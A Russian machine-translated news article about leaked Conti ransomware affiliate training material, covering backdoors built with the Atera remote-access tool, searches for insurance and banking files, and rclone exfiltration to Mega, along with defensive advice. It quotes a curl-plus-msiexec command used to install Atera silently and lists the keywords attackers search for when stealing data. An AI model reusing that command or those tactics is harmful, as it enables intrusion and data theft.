В этом месяце в сеть просочились обучающие материалы, используемые филиалами Conti по программам-вымогателям, что позволяет изнутри взглянуть на то, как злоумышленники злоупотребляют законным программным обеспечением и ищут полисы киберстрахования.
Ранее в этом месяце недовольный партнер опубликовал на хакерском форуме IP-адреса серверов Cobalt Strike C2, используемых бандой, и архив размером 113 МБ, содержащий обучающие материалы для проведения атак с использованием программ-вымогателей.
Сообщение на форуме от недовольного партнераИспользуя этот просочившийся учебный материал, исследователи безопасности, сетевые администраторы и специалисты по реагированию на инциденты могут лучше реагировать на атаки и быстро находить общие индикаторы компрометации (IOC), используемые бандой программ-вымогателей.
Именно так обстоит дело с новым исследованием, опубликованным генеральным директором Advanced Intel Виталием Кремезом, которое показывает, как в реальных атаках Conti использовалась просочившаяся информация.
Законное программное обеспечение удаленного доступа, используемое как бэкдоры
Интересная тактика, используемая бандой программ-вымогателей, заключается в использовании легитимного программного обеспечения удаленного доступа Atera в качестве бэкдора для постоянной устойчивости.При проведении атаки операции вымогателей обычно используют маяки Cobalt Strike, которые злоумышленники могут использовать для удаленного выполнения команд и получения постоянного доступа к сети.
Однако программные продукты безопасности стали более искусными в обнаружении ударных маяков Cobalt, что приводит к потере доступа для злоумышленников.
Чтобы предотвратить это, Кремез заявляет, что банда Конти устанавливает законное программное обеспечение удаленного доступа Atera на скомпрометированных системах, которое программное обеспечение безопасности не обнаруживает.
Поток атак программ-вымогателей Conti
Источник: Advanced Intel
Atera - это служба удаленного управления, в которой вы развертываете агентов на своих конечных точках, чтобы вы могли управлять ими всеми с единой консоли. Развернув агенты на всех скомпрометированных устройствах в сети, злоумышленники Conti получат удаленный доступ к любому устройству с единой платформы.
Кремез заявляет, что они видели следующую команду, используемую филиалами Conti для установки Atera на взломанное устройство:
shell curl -o setup.msi "" && msiexec /i setup.msi /qn IntegratorLogin=REDACTED@protonmail.com CompanyId=1
«В большинстве случаев злоумышленники использовали учетные записи электронной почты protonmail [.] Com и outlook [.] Com для регистрации в Atera, чтобы получить сценарий установки агента и доступ к консоли», - пояснил Кремез в своем блоге о Conti, использующем Atera.
Кремез советует администраторам использовать инструменты белого списка для блокировки или аудита инструментов командной строки, таких как curl, для обнаружения вредоносной активности.
«Проверяйте и / или блокируйте интерпретаторы командной строки, используя инструменты белого списка, такие как AppLocker или политики ограниченного использования программ, уделяя особое внимание любой подозрительной команде curl и неавторизованным сценариям установщика« .msi », особенно из C: \ ProgramData и C: \ Временный справочник », - советует Кремез.
Conti нацелен на страхование, банковские файлы
В одном из просочившихся документов под названием «CobaltStrike MANUAL_V2 .docx» подробно описаны конкретные шаги, которые аффилированное лицо должно использовать при проведении атаки программ-вымогателей Conti.После первой стадии атаки, которая заключается в взломе сети, сборе учетных данных и получении контроля над доменом Windows, злоумышленники приказывают своим аффилированным лицам начать кражу данных из скомпрометированной сети.
Этот этап важен для злоумышленников, поскольку файлы используются не только для того, чтобы запугать жертв и заставить их заплатить выкуп, но и украденные бухгалтерские документы и документы страхового полиса также используются для определения первоначальной суммы выкупа и проведения переговоров.
При первом извлечении данных с серверов жертвы банда программ-вымогателей Conti будет специально искать документы, касающиеся финансовых показателей компании и наличия у них политики кибербезопасности.
«поиск по ключевым словам. нужны бухгалтерские отчеты. банковские выписки. за 20-21 год. все свежее. особенно важно, киберстрахование, документы политики безопасности», - говорится в переведенном учебном документе Conti.
В частности, злоумышленники ищут следующие ключевые слова на первых этапах кражи данных:
cyber
policy
insurance
endorsement
supplementary
underwriting
terms
bank
2020
2021
Statement
Банда программ-вымогателей приказывает филиалам «немедленно подготовить пакет данных» и немедленно загрузить данные в Mega, которую они использовали в качестве хостинговой платформы для эксфильтрованных данных.
Кремез сказал, что злоумышленники используют легитимную программу rclone для загрузки данных непосредственно в сервис облачного хранилища Mega.
«Создается конфигурация Rclone, и устанавливается внешнее расположение (в данном случае MEGA) для синхронизации данных (клонирование данных). Необходимые сетевые ресурсы назначаются в rclone.conf в сети жертвы, и команда выполняется», - поясняет Кремез. сообщение в блоге .
Кремез заявляет, что вам следует сосредоточиться на любой команде rclone.exe, запускаемой из каталогов C: \ ProgramData и C: \ Temp, для обнаружения попыток кражи данных.
Перевод - Google
Bleeping Computer
Последнее редактирование модератором:
